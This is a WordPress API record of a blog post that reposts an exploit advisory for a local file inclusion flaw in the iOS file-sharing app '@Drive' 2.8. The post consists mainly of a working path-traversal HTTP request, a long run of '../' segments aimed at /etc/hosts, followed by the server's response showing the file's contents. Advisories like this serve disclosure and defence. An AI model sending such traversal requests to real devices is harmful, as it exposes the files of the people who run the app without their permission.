{"id":30247,"date":"2022-09-09T22:21:38","date_gmt":"2022-09-09T18:21:38","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/168316\/atdrive28-lfi.txt"},"modified":"2022-09-11T11:59:16","modified_gmt":"2022-09-11T07:29:16","slug":"drive-2-8-local-file-inclusion","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/drive-2-8-local-file-inclusion\/","title":{"rendered":"@Drive 2.8 Local File Inclusion"},"content":{"rendered":"<p dir=\"ltr\"># Exploit Title: @Drive 2.8 Local File inclusion<br \/>\n# Date: Sep 8, 2022<br \/>\n# Exploit Author: Chokri Hammedi<br \/>\n# Vendor Homepage: https:\/\/evolutive.co\/<br \/>\n# Software Link: https:\/\/apps.apple.com\/us\/app\/drive\/id578982909<br \/>\n# Version: 2.8<br \/>\n# Tested on: iPhone ios 15.6<\/p>\n<p dir=\"ltr\">GET \/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/hosts HTTP\/1.1<br \/>\nHost: 192.168.1.187<br \/>\nUser-Agent: Mozilla\/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)<br \/>\nAppleWebKit\/536.26 (KHTML, like Gecko) Version\/6.0 Mobile\/10A5376e<br \/>\nSafari\/8536.25<br \/>\nAccept: *\/*<br \/>\nReferer: http:\/\/192.168.1.187\/<br \/>\nAccept-Encoding: gzip, deflate<br \/>\nAccept-Language: en-US,en;q=0.9<br \/>\nConnection: close<\/p>\n<p dir=\"ltr\">&#8212;&#8212;&#8211;<\/p>\n<p dir=\"ltr\">HTTP\/1.1 200 OK<br \/>\nContent-Type: application\/octet-stream<br \/>\nContent-Length: 213<br \/>\nAccept-Ranges: bytes<br \/>\nDate: Thu, 08 Sep 2022 14:26:16 GMT<\/p>\n<p dir=\"ltr\">##<br \/>\n# Host Database<br \/>\n#<br \/>\n# localhost is used to configure the loopback interface<br \/>\n# when the system is booting. Do not change this entry.<br \/>\n##<br \/>\n127.0.0.1 localhost<br \/>\n255.255.255.255 broadcasthost<br \/>\n::1 localhost<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: @Drive 2.8 Local File inclusion # Date: Sep 8, 2022 # Exploit Author: Chokri Hammedi # Vendor Homepage: https:\/\/evolutive.co\/ # Software Link: https:\/\/apps.apple.com\/us\/app\/drive\/id578982909 # Version: 2.8 # Tested on: iPhone ios 15.6 GET \/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/hosts HTTP\/1.1 Host: 192.168.1.187 User-Agent: Mozilla\/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit\/536.26 (KHTML, like Gecko) &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-30247","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/30247","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=30247"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/30247\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=30247"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=30247"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=30247"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}